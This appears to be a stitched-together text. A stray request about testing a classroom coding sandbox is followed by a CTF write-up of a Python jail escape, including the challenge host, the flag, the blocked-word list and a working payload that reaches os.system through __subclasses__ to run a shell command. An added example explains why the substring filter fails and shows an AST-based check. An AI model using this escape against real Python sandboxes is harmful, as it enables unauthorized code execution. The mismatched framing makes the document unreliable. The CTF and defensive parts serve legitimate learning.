Setting up a new coding environment for my data science students. Some of them are l33t h4ck3rs that got RCE and crashed my machine a few times :(. Can you help test this before I use it for my class? Two sandboxes should be better than one...
nc pwn.chal.csaw.io 5011
FLAG = flag{y4_sl1th3r3d_0ut}
This challenge is a Python jail escape. This being the first Python jail escape I have ever tried and completed, I will give a brief summary of how I completed it the unintended way.
While skimming the Python script, I saw a check to see if the user's input was in a blacklist.
command = input(">>> ")
if any([x in command for x in blacklist.BLACKLIST]):
    raise Exception("not allowed!!")
So I connected to the server and ran the following command to get all the words that were blacklisted.
print(blacklist.BLACKLIST)
['__builtins__', '__import__', 'eval', 'exec', 'import',
'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
'subprocess', 'pty', 'platform', 'open', 'read', 'write',
'dir', 'type']
At this point I knew what commands I couldn't use and got completely stuck. I looked up other Python jail escape CTF challenges and came across two helpful writeups.
Escaping Python Jails
Python SSTI
It took me a lot of trial and error to finally come up with this over-engineered script.
print(''.__class__.__mro__[1].__subclasses__()[109].__init__.__globals__['SYS'.lower()].modules['OS'.lower()].__dict__['SYSTEM'.lower()]('cat flag.txt'))
I did look at the server to see where the flag was and I found the intended solution in the same directory as the flag.
I learned a lot from this challenge and hopefully will complete more of these.
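Why the payload above gets past the check, as an added example that is not part of the original writeup or the challenge's code: the blacklist test is a case-sensitive substring match on the raw input, so names that are only assembled at runtime with `.lower()` never appear in it. The `ALLOWED_NAMES` policy and the `ast_violations` helper are assumptions made for this illustration; they show a check on the parsed syntax tree for comparison.

```python
import ast

# Blacklist exactly as printed in the writeup.
BLACKLIST = ['__builtins__', '__import__', 'eval', 'exec', 'import',
             'from', 'os', 'sys', 'system', 'timeit', 'base64commands',
             'subprocess', 'pty', 'platform', 'open', 'read', 'write',
             'dir', 'type']

# The payload from the writeup, unchanged (split only for line length).
PAYLOAD = ("print(''.__class__.__mro__[1].__subclasses__()[109].__init__"
           ".__globals__['SYS'.lower()].modules['OS'.lower()]"
           ".__dict__['SYSTEM'.lower()]('cat flag.txt'))")

def substring_filter_blocks(command):
    """The challenge's check: case-sensitive substring match on raw input."""
    return any(x in command for x in BLACKLIST)

# Assumed policy for this example: only these names may be referenced.
ALLOWED_NAMES = {"print", "len", "sum", "min", "max", "range"}

def ast_violations(command):
    """Return the reasons a parsed command breaks the allowlist policy."""
    try:
        tree = ast.parse(command, mode="eval")
    except SyntaxError:
        return ["not a single expression"]
    reasons = []
    for node in ast.walk(tree):
        # Attribute walks such as .__class__ or .__globals__ are rejected
        # by their syntax, regardless of how later strings are built.
        if isinstance(node, ast.Attribute) and node.attr.startswith("_"):
            reasons.append("underscore attribute: " + node.attr)
        elif isinstance(node, ast.Name) and node.id not in ALLOWED_NAMES:
            reasons.append("name not allowlisted: " + node.id)
    return reasons

if __name__ == "__main__":
    print("substring filter blocks payload:", substring_filter_blocks(PAYLOAD))
    for reason in ast_violations(PAYLOAD):
        print("AST check:", reason)
    print("benign input:", ast_violations("print(sum(range(10)))"))
```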